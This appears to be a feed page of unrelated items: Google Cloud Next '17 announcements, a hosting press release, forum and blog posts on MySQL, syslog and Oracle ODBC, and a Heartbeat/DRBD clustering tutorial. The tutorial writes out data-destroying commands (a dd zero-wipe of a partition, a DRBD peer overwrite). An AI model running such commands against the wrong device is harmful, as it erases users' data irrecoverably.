  • Development engineering support - ideal for developers or QA engineers that can manage with a response within four to eight business hours, priced at $100/user per month.
  • Production engineering support provides a one-hour response time for critical issues at $250/user per month.
  • On-call engineering support pages a Google engineer and delivers a 15-minute response time 24x7 for critical issues at $1,500/user per month.

32. Cloud.google.com/community site - Google Cloud Platform Community is a new site to learn, connect and share with other people like you, who are interested in GCP. You can follow along with tutorials or submit one yourself, find meetups in your area, and learn about community resources for GCP support, open source projects and more.


New GCP developer platforms and tools reinforce our commitment to openness and choice and giving you what you need to move fast and focus on great code.

33. Google AppEngine Flex (GA) - We announced a major expansion of our popular App Engine platform to new developer communities that emphasizes openness, developer choice, and application portability.

34. Cloud Functions (Beta) - Google Cloud Functions has launched into public beta. It is a serverless environment for creating event-driven applications and microservices, letting you build and connect cloud services with code.

35. Firebase integration with GCP (GA) - Firebase Storage is now Google Cloud Storage for Firebase and adds support for multiple buckets, support for linking to existing buckets, and integrates with Google Cloud Functions.

36. Cloud Container Builder - Cloud Container Builder is a standalone tool that lets you build your Docker containers on GCP regardless of deployment environment. It’s a fast, reliable, and consistent way to package your software into containers as part of an automated workflow.

37. Community Tutorials (Beta)  - With community tutorials, anyone can now submit or request a technical how-to for Google Cloud Platform.


Secure, global and high-performance, we’ve built our cloud for the long haul. This week we announced a slew of new infrastructure updates. 

38. New data center region: California - This new GCP region delivers lower latency for customers on the West Coast of the U.S. and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

39. New data center region: Montreal - This new GCP region delivers lower latency for customers in Canada and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

40. New data center region: Netherlands - This new GCP region delivers lower latency for customers in Western Europe and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

41. Google Container Engine - Managed Nodes - Google Container Engine (GKE) has added Automated Monitoring and Repair of your GKE nodes, letting you focus on your applications while Google ensures your cluster is available and up-to-date.

42. 64 Core machines + more memory - We have doubled the number of vCPUs you can run in an instance from 32 to 64, and now offer up to 416GB of memory per instance.

43. Internal Load balancing (GA) - Internal Load Balancing, now GA, lets you run and scale your services behind a private load balancing IP address which is accessible only to your internal instances, not the internet.

44. Cross-Project Networking (Beta) - Cross-Project Networking (XPN), now in beta, is a virtual network that provides a common network across several Google Cloud Platform projects, enabling simple multi-tenant deployments.


In the past year, we’ve launched 300+ features and updates for G Suite and this week we announced our next generation of collaboration and communication tools.

45. Team Drives (GA for G Suite Business, Education and Enterprise customers) - Team Drives help teams simply and securely manage permissions, ownership and file access for an organization within Google Drive.

46. Drive File Stream (EAP) - Drive File Stream is a way to quickly stream files directly from the cloud to your computer. With Drive File Stream, company data can be accessed directly from your laptop, even if you don’t have much space on your hard drive.

47. Google Vault for Drive (GA for G Suite Business, Education and Enterprise customers) - Google Vault for Drive now gives admins the governance controls they need to manage and secure all of their files, including employee Drives and Team Drives. Google Vault for Drive also lets admins set retention policies that automatically keep what’s needed and delete what’s not.

48. Quick Access in Team Drives (GA) - powered by Google’s machine intelligence, Quick Access helps to surface the right information for employees at the right time within Google Drive. Quick Access now works with Team Drives on iOS and Android devices, and is coming soon to the web.

49. Hangouts Meet (GA to existing customers) - Hangouts Meet is a new video meeting experience built on Hangouts that can run 30-person video conferences without accounts, plugins or downloads. For G Suite Enterprise customers, each call comes with a dedicated dial-in phone number so that team members on the road can join meetings without wifi or data issues.

50. Hangouts Chat (EAP) - Hangouts Chat is an intelligent communication app in Hangouts with dedicated, virtual rooms that connect cross-functional enterprise teams. Hangouts Chat integrates with G Suite apps like Drive and Docs, as well as photos, videos and other third-party enterprise apps.

51. @meet - @meet is an intelligent bot built on top of the Hangouts platform that uses natural language processing and machine learning to automatically schedule meetings for your team with Hangouts Meet and Google Calendar.

52. Gmail Add-ons for G Suite (Developer Preview) - Gmail Add-ons provide a way to surface the functionality of your app or service directly in Gmail. With Add-ons, developers only build their integration once, and it runs natively in Gmail on web, Android and iOS.

53. Edit Opportunities in Google Sheets - with Edit Opportunities in Google Sheets, sales reps can sync a Salesforce Opportunity List View to Sheets to bulk edit data and changes are synced automatically to Salesforce, no upload required.

54. Jamboard - Our whiteboard in the cloud goes GA in May! Jamboard merges the worlds of physical and digital creativity. It’s real time collaboration on a brilliant scale, whether your team is together in the conference room or spread all over the world.


Building on the momentum from a growing number of businesses using Chrome digital signage and kiosks, we added new management tools and APIs in addition to introducing support for Android Kiosk apps on supported Chrome devices. 

55. Android Kiosk Apps for Chrome - Android Kiosk for Chrome lets users manage and deploy Chrome digital signage and kiosks for both web and Android apps. And with Public Session Kiosks, IT admins can now add a number of Chrome packaged apps alongside hosted apps.

56. Chrome Kiosk Management Free trial - This free trial gives customers an easy way to test out Chrome for signage and kiosk deployments.

57. Chrome Device Management (CDM) APIs for Kiosks - These APIs offer programmatic access to various Kiosk policies. IT admins can schedule a device reboot through the new APIs and integrate that functionality directly into a third-party console.

58. Chrome Stability API - This new API allows Kiosk app developers to improve the reliability of the application and the system.


Attendees at Google Cloud Next ‘17 heard stories from many of our valued customers:

59. Colgate - Colgate-Palmolive partnered with Google Cloud and SAP to bring thousands of employees together through G Suite collaboration and productivity tools. The company deployed G Suite to 28,000 employees in less than six months.

60. Disney Consumer Products & Interactive (DCPI) - DCPI is on target to migrate out of its legacy infrastructure this year, and is leveraging machine learning to power next generation guest experiences.

61. eBay - eBay uses Google Cloud technologies including Google Container Engine, Machine Learning and AI for its ShopBot, a personal shopping bot on Facebook Messenger.

62. HSBC - HSBC is one of the world's largest financial and banking institutions and making a large investment in transforming its global IT. The company is working closely with Google to deploy Cloud DataFlow, BigQuery and other data services to power critical proof of concept projects.

63. LUSH - LUSH migrated its global e-commerce site from AWS to GCP in less than six weeks, significantly improving the reliability and stability of its site. LUSH benefits from GCP’s ability to scale as transaction volume surges, which is critical for a retail business. In addition, Google's commitment to renewable energy sources aligns with LUSH's ethical principles.

64. Oden Technologies - Oden was part of Google Cloud’s startup program, and switched its entire platform to GCP from AWS. GCP offers Oden the ability to scale reliably while keeping costs low, to perform under heavy loads, and to consistently deliver sophisticated features including machine learning and data analytics.

65. Planet - Planet migrated to GCP in February, looking to accelerate their workloads and leverage Google Cloud for several key advantages: price stability and predictability, custom instances, first-class Kubernetes support, and Machine Learning technology. Planet also announced the beta release of their Explorer platform.

66. Schlumberger - Schlumberger is making a critical investment in the cloud, turning to GCP to enable high-performance computing, remote visualization and development velocity. GCP is helping Schlumberger deliver innovative products and services to its customers by using HPC to scale data processing, workflow and advanced algorithms.

67. The Home Depot - The Home Depot collaborated with GCP’s Customer Reliability Engineering team to migrate HomeDepot.com to the cloud in time for Black Friday and Cyber Monday. Moving to GCP has allowed the company to better manage huge traffic spikes at peak shopping times throughout the year.

68. Verizon - Verizon is deploying G Suite to more than 150,000 of its employees, allowing for collaboration and flexibility in the workplace while maintaining security and compliance standards. Verizon and Google Cloud have been working together for more than a year to bring simple and secure productivity solutions to Verizon’s workforce.


We brought together Google Cloud partners from our growing ecosystem across G Suite, GCP, Maps, Devices and Education. Our partnering philosophy is driven by a set of principles that emphasize openness, innovation, fairness, transparency and shared success in the cloud market. Here are some of our partners who were out in force at the show:

69. Accenture - Accenture announced that it has designed a mobility solution for Rentokil, a global pest control company, built in collaboration with Google as part of the partnership announced at Horizon in September.

70. Alooma - Alooma announced the integration of the Alooma service with Google Cloud SQL and BigQuery.

71. Authorized Training Partner Program - To help companies scale their training offerings more quickly, and to enable Google to add other training partners to the ecosystem, we are introducing a new track within our partner program to support their unique offerings and needs.

72. Check Point - Check Point® Software Technologies announced Check Point vSEC for Google Cloud Platform, delivering advanced security integrated with GCP as well as their joining of the Google Cloud Technology Partner Program.

73. CloudEndure - We’re collaborating with CloudEndure to offer a no cost, self-service migration tool for Google Cloud Platform (GCP) customers.

74. Coursera - Coursera announced that it is collaborating with Google Cloud Platform to provide an extensive range of Google Cloud training courses. To celebrate this announcement, Coursera is offering all NEXT attendees a 100% discount for the GCP fundamentals class.

75. DocuSign - DocuSign announced deeper integrations with Google Docs.

76. Egnyte - Egnyte announced an enhanced integration with Google Docs that will allow our joint customers to create, edit, and store Google Docs, Sheets and Slides files right from within Egnyte Connect.

77. Google Cloud Global Partner Awards - We recognized 12 Google Cloud partners that demonstrated strong customer success and solution innovation over the past year: Accenture, Pivotal, LumApps, Slack, Looker, Palo Alto Networks, Virtru, SoftBank, DoIT, Snowdrop Solutions, CDW Corporation, and SYNNEX Corporation.

78. iCharts - iCharts announced additional support for several GCP databases, free pivot tables for current Google BigQuery users, and a new product dubbed “iCharts for SaaS.”

79. Intel - In addition to the progress with Skylake, Intel and Google Cloud launched several technology initiatives and market education efforts covering IoT, Kubernetes and TensorFlow, including optimizations, a developer program and tool kits.

80. Intuit - Intuit announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

81. Liftigniter - Liftigniter is a member of Google Cloud’s startup program and focused on machine learning personalization using predictive analytics to improve CTR on web and in-app.

82. Looker - Looker launched a suite of Looker Blocks, compatible with Google BigQuery Data Transfer Service, designed to give marketers the tools to enhance analysis of their critical data.

83. Low interest loans for partners - To help Premier Partners grow their teams, Google announced that capital investments are available to qualified partners in the form of low interest loans.

84. MicroStrategy - MicroStrategy announced an integration with Google Cloud SQL for PostgreSQL and Google Cloud SQL for MySQL.

85. New incentives to accelerate partner growth - We are increasing our investments in multiple existing and new incentive programs; including, low interest loans to help Premier Partners grow their teams, increasing co-funding to accelerate deals, and expanding our rebate programs.

86. Orbitera Test Drives for GCP Partners - Test Drives allow customers to try partners’ software and generate high quality leads that can be passed directly to the partners’ sales teams. Google is offering Premier Cloud Partners one year of free Test Drives on Orbitera.

87. Partner specializations - Partners demonstrating strong customer success and technical proficiency in certain solution areas will now qualify to apply for a specialization. We’re launching specializations in application development, data analytics, machine learning and infrastructure.

88. Pivotal - GCP announced Pivotal as our first CRE technology partner. CRE technology partners will work hand-in-hand with Google to thoroughly review their solutions and implement changes to address identified risks to reliability.

89. ProsperWorks - ProsperWorks announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

90. Qwiklabs - This recent acquisition will provide Authorized Training Partners the ability to offer hands-on labs and comprehensive courses developed by Google experts to our customers.

91. Rackspace - Rackspace announced a strategic relationship with Google Cloud to become its first managed services support partner for GCP, with plans to collaborate on a new managed services offering for GCP customers set to launch later this year.

92. Rocket.Chat - Rocket.Chat, a member of Google Cloud’s startup program, is adding a number of new product integrations with GCP including Autotranslate via Translate API, integration with Vision API to screen for inappropriate content, integration with NLP API to perform sentiment analysis on public channels, integration with G Suite for authentication and a full move of back-end storage to Google Cloud Storage.

93. Salesforce - Salesforce announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

94. SAP - This strategic partnership includes certification of SAP HANA on GCP, new G Suite integrations and future collaboration on building machine learning features into intelligent applications like conversational apps that guide users through complex workflows and transactions.

95. Smyte - Smyte participated in the Google Cloud startup program and protects millions of actions a day on websites and mobile applications. Smyte recently moved from self-hosted Kubernetes to Google Container Engine (GKE).

96. Veritas - Veritas expanded its partnership with Google Cloud to provide joint customers with 360 Data Management capabilities. The partnership will help reduce data storage costs, increase compliance and eDiscovery readiness and accelerate the customer’s journey to Google Cloud Platform.

97. VMware Airwatch - Airwatch provides enterprise mobility management solutions for Android and continues to drive the Google Device ecosystem to enterprise customers.

98. Windows Partner Program - We’re working with top systems integrators in the Windows community to help GCP customers take full advantage of Windows and .NET apps and services on our platform.

99. Xplenty - Xplenty announced the addition of two new services from Google Cloud into their available integrations: Google Cloud Spanner and Google Cloud SQL for PostgreSQL.

100. Zoomdata - Zoomdata announced support for Google’s Cloud Spanner and PostgreSQL on GCP, as well as enhancements to the existing Zoomdata Smart Connector for Google BigQuery. With these new capabilities Zoomdata offers deeply integrated and optimized support for Google Cloud Platform’s Cloud Spanner, PostgreSQL, Google BigQuery, and Cloud DataProc services.

We’re thrilled to have so many new products and partners that can help all of our customers grow. And as our final announcement for Google Cloud Next ’17 — please save the date for Next 2018: June 4–6 in San Francisco.

I guess that makes it 101. :-)

          Migrate a database from MySQL to IBM Informix Innovator-C Edition, Part 2: Step-by-step walk-through of the migration process        
Walk through a migration from MySQL to Informix, step by step. The tutorial provides a conversion methodology and discusses the processes for migrating both database objects and data. It includes a discussion of SQL differences and shows how to migrate tables, views, stored procedures, functions, triggers, and more.
          Inmotion Hosting - Inexpensive Cpanel Website Hosting Business        

InMotion is so confident in its services that customers can subscribe securely, backed by a 30-day money-back guarantee.

Nashville, TN -- (SBWIRE) -- 02/28/2014 -- The three pillars that have made InMotion one of the most popular and best-regarded web hosting companies are its cost, speed and stability. The Linux-based web hosting service is supervised around the clock by skilled experts, who not only monitor the operation of the web server but also work to improve the performance of the host. The entry-level hosting package costs only $6.95 per month and is among the most popular deals available at the moment.

Among the greatest benefits of InMotion hosting is its robust e-mail offering. Whether for business or personal needs, InMotion customers can create unlimited email accounts. Because these are webmail accounts, users can access them easily from anywhere. Customers can also manage their site through the familiar cPanel. From e-mail to file access, website managers have over 30 features giving them total control of the website.

Based on the InMotion hosting review, the service supports technologies such as CGI, PHP, SSI, Python and Perl. Flash support and MySQL are also available to customers. A few multimedia aids are provided as well, such as MIDI files, Real Audio and several streaming platforms with a dedicated IP address. The reporting, marketing tools and data supplied by InMotion are also solid, including tools that help owners improve their marketing results by promoting their websites with well-known keywords.

About bestwebhostingrates.com
Bestwebhostingrates is an online portal providing current and substantial reviews of web hosting companies to help anyone start a reliable website. The portal collects firsthand data from real clients and researches the capabilities, features and upgrades of numerous servers available online.

Contact Information:
For more information and other media related inquiries, please contact:
Contact Name: James Berke
Contact Phone: (320) 634-6781
Contact Email: james@bestwebhostingratings.com
Website: http://www.bestwebhostingrates.com/
Complete Address: 7051 Highway 70 South Suite 126
Zip Code: 37221

For more information on this press release visit: http://www.sbwire.com/press-releases/inmotion-hosting-inexpensive-cpanel-website-hosting-business-469196.htm

Media Relations Contact

Steve Kaplan
Telephone: 320-634-6781
Email: Click to Email Steve Kaplan
Web: http://www.bestwebhostingrates.com/

          Heartbeat and DRBD        
In one deployment I had to replace a vrrpd (Virtual Router Redundancy Protocol) setup with heartbeat+drbd because a database was added to the server. The machine originally ran only a static web server, named and dhcpd, all relatively static services whose files I synchronized with rsync. With the addition of a database (MySQL), however, I needed a mechanism by which data stored on the primary machine is also written directly to the backup machine. For that, vrrpd alone is not enough, so I replaced vrrpd with heartbeat (pronounced "heart-beat", not "hert-bet" :-) ) and used drbd to provide the cluster mechanism.

Implementing heartbeat by itself is very easy: just download, compile and configure three files, /etc/ha.d/ha.cf, /etc/ha.d/authkeys and /etc/ha.d/haresources. For drbd you can download the tarball, but don't forget to read the documentation, because drbd must be compiled properly against your kernel source; otherwise you may have trouble probing the drbd module. On this server I used openSUSE 11.1, which makes life easier: just use 1-click install for heartbeat, the drbd kernel module and the drbd user-space tools, or enable the repository http://download.opensuse.org/repositories/server:/ha-clustering/

Heartbeat Configuration

Make sure you use two servers for the high-availability cluster. If you only have one, you don't need heartbeat and drbd :-). For more than two servers it is better to use pacemaker and openAIS, which support N-to-N or N+1 clusters up to a theoretically unlimited number of nodes; I will not cover pacemaker and openAIS here.
Use two Ethernet cards in each server, or one Ethernet card plus a direct null-modem cable connection between the two servers.
One Ethernet interface connects to the network; the other should preferably be connected directly between the servers with a cross-over cable (not required, but recommended).
Make sure the Ethernet interfaces are working properly.
In the scenario above, the real IP on eth0 is set permanently with ifup, while the virtual IP will be set through /etc/ha.d/haresources. Replace the IP addresses with the ones you actually use.
Configure /etc/ha.d/ha.cf, /etc/ha.d/haresources and /etc/ha.d/authkeys. These files must be identical on both servers.
Example ha.cf file

keepalive 2
warntime 5
deadtime 15
initdead 90
udpport 694
auto_failback on
bcast eth0
node server1 server2

bcast eth0 names the Ethernet interface that clients will use to reach the server. node is followed by the names of the primary and secondary servers, exactly as reported by "uname -n".

Example authkeys file

If the two servers are connected with a null-modem or cross-over cable, you can skip encryption and fill the authkeys file with, for example:

auth 2
2 crc

But if you are using a network, for example when the two servers are geographically separated, encryption is strongly recommended, in the format:

auth num
num algorithm secret

You can generate one with the script below:

# ( echo -ne "auth 1 1 sha1 "; dd if=/dev/urandom bs=512 count=1 | openssl md5 )  > /etc/ha.d/authkeys

Then make sure authkeys can be read and written only by root: # chmod 0600 /etc/ha.d/authkeys

Example /etc/ha.d/haresources file

A haresources configuration without drbd / before drbd is enabled might look like:

    server1 IPaddr:: named dhcpd apache2
The meaning of that line is:

server1 --> name of the primary server as reported by "uname -n"
IPaddr:: --> the virtual IP address used on eth0
named dhcpd apache2 --> the names of the redundant services
You can set the heartbeat service to start at boot in the appropriate run levels, for example with "chkconfig heartbeat on" or, on openSUSE, with "insserv /etc/init.d/heartbeat". On openSUSE I prefer to start it from /etc/init.d/after.local, e.g. vim /etc/init.d/after.local:

#! /bin/sh
sleep 2
rcheartbeat start

Don't forget to copy all the configuration files you created on server1 over to server2 (use scp or whatever): ha.cf, haresources, authkeys and after.local (if you use it). Heartbeat actually provides ha_propagate to copy the configuration from the primary node to the other cluster nodes; look for it in /usr/share/heartbeat/ha_propagate or /usr/lib/heartbeat/ha_propagate. I still prefer scp :-)

From server1, try "ifconfig": if everything is OK, eth0:0 will appear with the virtual IP. From a client, ping and ssh to that IP; if you get in, heartbeat is working. Next, stop the heartbeat service on server1 and check with ifconfig that eth0:0 is gone. Log in to server2 and check with ifconfig: eth0:0 with the virtual IP should now have been taken over by server2. To hand it back to server1, start the heartbeat service on server1 again. If all of this works, the heartbeat service is running perfectly. You can also test by taking down eth0 on server1 and verifying that the virtual IP on eth0:0 is likewise taken over by server2.

drbd Configuration

Drbd stands for Distributed Replicated Block Device. Drbd mirrors every block device you define for it and works as RAID-1 over the network. Configuring drbd is fairly easy, although not as easy as heartbeat :-P You will need some patience. A few things to watch out for: the user-space tools and the kernel module must be the same version. There was a case where someone downloaded the tarball and updated an existing drbd installation, but did not specify the kernel directory when running configure; as a result the drbd user-space tools (e.g. drbdadm) were upgraded while the drbd.ko module was not, and the machine could hang :-( At a minimum, configure with: ./configure --prefix=/usr --localstatedir=/var --sysconfdir=/etc --with-km

Then run:

# cd drbd
# make clean
# make KDIR=/path/to/kernel/source
openSUSE users can skip these steps and simply install with 1-click install as mentioned at the beginning of this article.

Another common mistake when configuring drbd is to create a filesystem while partitioning the disk for the drbd device. Avoid this until the drbd module has been loaded for the first time. Here are the steps:

Prepare the partitions for the /dev/drbd device that will replicate to each other, and leave them without a filesystem. The partition size determines how long the two sides take to synchronize: the bigger the partition, the longer it takes to reach the Consistent state. You can also set aside an additional partition for metadata, although that is not mandatory. The partition size must be the same on both servers.

Edit /etc/drbd.conf to read:

# You can find an example in  /usr/share/doc/drbd.../drbd.conf.example

#include "drbd.d/global_common.conf";
#include "drbd.d/*.res";

global { usage-count yes; }

resource r0 {
  protocol C;
  net {
    after-sb-0pri discard-younger-primary;
    after-sb-1pri discard-secondary;
    after-sb-2pri disconnect;
  }
  on server1 {
    device /dev/drbd0;
    disk /dev/cciss/c0d0p6;
    meta-disk internal;
  }
  on server2 {
    device /dev/drbd0;
    disk /dev/cciss/c0d0p6;
    meta-disk internal;
  }
}
On server1 and server2, run:

# modprobe drbd
# drbdadm up all
# cat /proc/drbd
Both servers should then show output like:

server1:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
    ns:45542488 nr:0 dw:0 dr:45542488 al:0 bm:2779 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

server2:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:Inconsistent/Inconsistent C r---
    ns:45542488 nr:0 dw:0 dr:45542488 al:0 bm:2779 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

Next, create the drbd metadata on each server:

server1:~ # drbdadm create-md r0
server1:~ # rcdrbd start
server2:~ # drbdadm create-md r0
server2:~ # rcdrbd start
We will make server1 the primary node, so run the following on server1:

server1:~ # drbdadm  primary all
server1:~ # drbdadm connect all
If you run into problems here, the most likely cause is an existing filesystem. To wipe the filesystem without changing the partition, run:

dd if=/dev/zero bs=512 count=512 of=/dev/your_partition

You may also find that a mistake during drbd initialization has left both disks in the Primary/Secondary Inconsistent/Inconsistent state; at this stage everything should be Secondary/Secondary. If you hit this problem, run:

server1:~ # drbdadm -- --overwrite-data-of-peer primary all

Then run on server1:

          server1:~# drbdsetup /dev/drbd0 primary --overwrite-data-of-peer

The initial synchronization will now start:

server1:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:SyncSource st:Primary/Secondary ds:UpToDate/Inconsistent C r---
    ns:36350976 nr:0 dw:0 dr:36351244 al:0 bm:2218 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:68502008
        [=====>..............] sync'ed: 34.7% (66896/102392)M
        finish: 53:31:01 speed: 348 (320) K/sec
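As a side note, the finish time drbd prints can be sanity-checked with simple arithmetic: divide the data still out of sync by the current rate. A quick sketch using the numbers from the sample output above (illustrative only; real rates vary with network and disk load):

```shell
# back-of-the-envelope check of drbd's finish estimate
remaining_mb=66896      # 102392M total minus the 34.7% already synced
rate_kb_per_s=348       # current speed reported by /proc/drbd
seconds=$(( remaining_mb * 1024 / rate_kb_per_s ))
hours=$(( seconds / 3600 ))
echo "~${hours} hours to go"
```

This lands close to the 53:31:01 drbd reports; the small difference comes from drbd averaging the rate over a window.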

The process takes quite a while, depending on the size of the disk used as the drbd device. Be patient and wait until it finishes. I always let the first synchronization reach 100% before doing anything else (though this is not required). When it finishes, the output will look like:

server1:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:UpToDate/UpToDate C r---
    ns:45542488 nr:0 dw:0 dr:45542488 al:0 bm:2779 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

server2:~ # cat /proc/drbd
version: 8.2.7 (api:88/proto:86-88)
GIT-hash: a1b440e8b3011a1318d8bff1bb7edc763ef995b0 build by lmb@hermes, 2009-02-20 13:35:59
 0: cs:Connected st:Secondary/Secondary ds:UpToDate/UpToDate C r---
    ns:0 nr:44887544 dw:44887544 dr:0 al:0 bm:2740 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0 

Next we create the filesystem on server1. This only needs to be done on server1; server2 will follow:

server1:~ # drbdadm primary all
server1:~ # mkfs.ext3 /dev/drbd0
Now prepare the MySQL directory on server1:

mkdir /data-mysql

mount -t ext3 /dev/drbd0 /data-mysql

mv /var/lib/mysql /data-mysql

ln -s /data-mysql/mysql /var/lib/mysql

umount /data-mysql

On server2:

 mv /var/lib/mysql /tmp

 ln -s /data-mysql/mysql /var/lib/mysql

Edit /etc/ha.d/haresources on server1 and server2 to read:

server1 IPaddr:: drbddisk::r0 Filesystem::/dev/drbd0::/data-mysql::ext3 named dhcpd apache2 mysql

Finally, drbd and heartbeat need to be started in runlevels 3 and 5 every time the server boots. On openSUSE I use /etc/init.d/after.local to start drbd and heartbeat; this simply ensures that they are started last, after all other services are up. Just create /etc/init.d/after.local with, for example:


#! /bin/sh
sleep 1
rcdrbd start
sleep 2
rcheartbeat start

Now all that remains is to test it: do the services defined in /etc/ha.d/haresources fail over to server2 when server1 is shut down? You know how to test this, right? It is roughly the same as testing heartbeat above.

Have a lot of fun  
          Things to watch when adjusting the configuration        
Things to watch when adjusting the configuration – MySQL is a multithreaded, multi-user SQL database management system (DBMS). MySQL AB makes MySQL available as free software under the GNU General Public License (GPL), but they ...
          30.08.2012 08:19:35 Deks        
I also run a syslog server that collects all the logs from our Windows servers into a MySQL database. I have noticed, though, that some logs arrive truncated :( The Message field apparently gets cut off when it is large enough. I checked with a direct query against the database, and they are truncated there as well. I have also noticed that some logs arrive with a completely empty Message field. Of course, the problem may be with the client that forwards all of this to the syslog server; I use Evtsys.
By the way, a question: does anyone know how to send alerts from an rsyslog server to Jabber? :)
          30.08.2012 08:10:32 JukeBox        
Here is how I did it: using Snare I converted the Eventlog to Syslog and sent it to a neighboring Linux server, where a Perl script processed every line and classified it against these patterns:

if($_[0]=~m/READ_CONTROL ReadData \(or ListDirectory\) ReadEA ReadAttributes/i){return OPEN;}
elsif($_[0]=~m/READ_CONTROL ReadData \(or ListDirectory\) WriteData \(or AddFile\) AppendData \(or AddSubdirectory or CreatePipeInstance\) ReadEA WriteEA ReadAttributes WriteAttributes/i){return EDIT;}
elsif($_[0]=~m/DELETE ReadAttributes/i){return DELETE;}
elsif($_[0]=~m/READ_CONTROL WRITE_DAC ReadData \(or ListDirectory\) WriteData \(or AddFile\) AppendData \(or AddSubdirectory or CreatePipeInstance\) ReadEA WriteEA ReadAttributes WriteAttributes/i){return PASTE;}
elsif($_[0]=~m/DELETE SYNCHRONIZE/i){return MOVE;}
elsif($_[0]=~m/DELETE READ_CONTROL ReadData \(or ListDirectory\) WriteData \(or AddFile\) AppendData \(or AddSubdirectory or CreatePipeInstance\) WriteEA ReadAttributes WriteAttributes/i){return MOVE;}

Everything was then written to MySQL, and the reports were built from that database, without loading the Windows server.
But your checks are more detailed, of course; mine sometimes classified actions incorrectly and generated a lot of noise in the logs. I should rewrite it along the lines of your article, thanks!

          OracleToMysql 2.3        
OracleToMysql - Import Oracle to MySQL easy and quickly.
          ORA-01017: invalid username/password; logon denied        
I’ve been testing unixODBC with MySQL and PostgreSQL and recently tried using it with Oracle 11g. After getting everything set up I kept getting the following error: 28000:1:1017:[unixODBC][Oracle][ODBC][Ora]ORA-01017: invalid username/password; logon denied. I finally discovered that this is because Oracle uses “UserID” instead of “User” in the ODBC configuration of the DSN.
          Partitioning perils, and loading Really Big MySQL tables        
We discovered an interesting problem in our environment. Our schema and partitioning rules were originally designed for the single-customer version of our product. When we went to a multi-customer hosted SaaS product, the simplest approach was to change our ID generator to bake the customer ID into the lower bytes of all our IDs, and use the high bytes for the sequence part of the ID. This works well, and allowed our code and schema to go to a multi-customer environment easily.

But one interesting point that we missed was that we had partitioned some of our biggest tables using simple hashes on ID. This gave a nice, even distribution of data in partitions before we did the "cooked" version of our IDs. But MySQL uses a simple "mod(value, n_partitions)" as the hash function for hashed partitions, and we also used "mod(id, customer_multiplier)" to grab the customer ID out of a general ID (with customer_multiplier greater than n_partitions), so we ended up effectively partitioning these tables by customer ID.
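The accidental partition-by-customer effect is just modular arithmetic, and can be sketched in a few lines of shell. The multiplier and partition count below are made-up illustrative values (not our real ones); the collapse happens whenever customer_multiplier is a multiple of n_partitions:

```shell
# assumption: IDs are built as seq * customer_multiplier + customer_id,
# and customer_multiplier is a multiple of n_partitions (e.g. both powers of 2)
customer_multiplier=65536
n_partitions=1024
for seq in 1 2 3; do
  for cust in 7 42; do
    id=$(( seq * customer_multiplier + cust ))
    # mod(id, n_partitions) collapses to the customer ID: the sequence part vanishes
    echo "cust=$cust seq=$seq -> partition $(( id % n_partitions ))"
  done
done
```

Every row for a given customer lands in the same partition, so partition sizes mirror customer sizes.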

This wouldn't be so bad except our customers vary drastically in size, so this is a poor partition choice (and is why we didn't choose to explicitly use customer ID as a partition rule, even though it was discussed).


We get to rebuild some huge tables in our archive, using a new partition rule that strips off the customer ID portion of the ID before doing the partition hash. I've been doing experiments, and we'll go with a copy, catchup, and replace strategy. The "copy" bit can be done with the db and apps live, and takes a couple of days to do. The catchup bit needs to happen with the apps offline, but is fairly fast. Once this is done, we can rename the copy table over the existing table, and we've effectively done the "alter table" operation.

As for building the copy table, I found I got the fastest loads when doing a Create Table as Select with the Select part ordered by the partition rule itself:

create table copytab (cols)
engine=innodb
partition by hash(id div cust_multiplier) partitions 1024
as select cols
from source_tab order by mod(id div cust_multiplier, 1024), id;

This "order by" groups all the rows by partition, which results in each partition being built completely before the next partition is built, and the secondary ordering by ID causes each partition B-tree to be inserted in sort order. As for MySQL configuration parameters, I temporarily set sort_buffer_size to 8GB and lowered the buffer pool size a bit.
          The case for a new open-source relational database        
I've been thinking about a new open-source relational database for a while, and here are my thoughts as to why the world needs one, even though PostgreSQL and MySQL would seem to have a lock, with SQLite doing well in small devices.

First, some strengths and weaknesses of each:

1. PostgreSQL is very good at query optimization, and has a large and powerful set of query answering facilities. Where it isn't so wonderful is its storage engine, where the old "versioned" storage manager - complete with its vacuum cleaner, which sucked in 1990 when I worked on it and remains an operational PITA - still resides. It "works", and is serviceable for many applications (particularly large archival apps, where deletes and updates are done rarely or never), but is a huge problem for always-up OLTP apps.

2. OTOH, MySQL has the opposite problem: its parser and executor are lame (gee, will they ever figure out how to cache constant subquery results? How about hash joins? Type checking? Not making friggin' case-insensitive Swedish the default collation?), but its open storage architecture allows lots of interesting storage engines, and InnoDB's index-organized structure kicks butt if you know how to use it. We use MySQL/InnoDB ourselves for a very large SaaS database with both heavy OLTP components and heavy archival search components. To get around its sucky top level, I have to carefully police all significant queries, make extensive use of optimizer hints, and work with developers to make certain they aren't doing something problematic like using a subquery that is always treated as correlated, etc.

In a dream-world, I could figure out a way to hook up PostgreSQL's top level with the InnoDB storage engine. That would be a powerful relational engine.
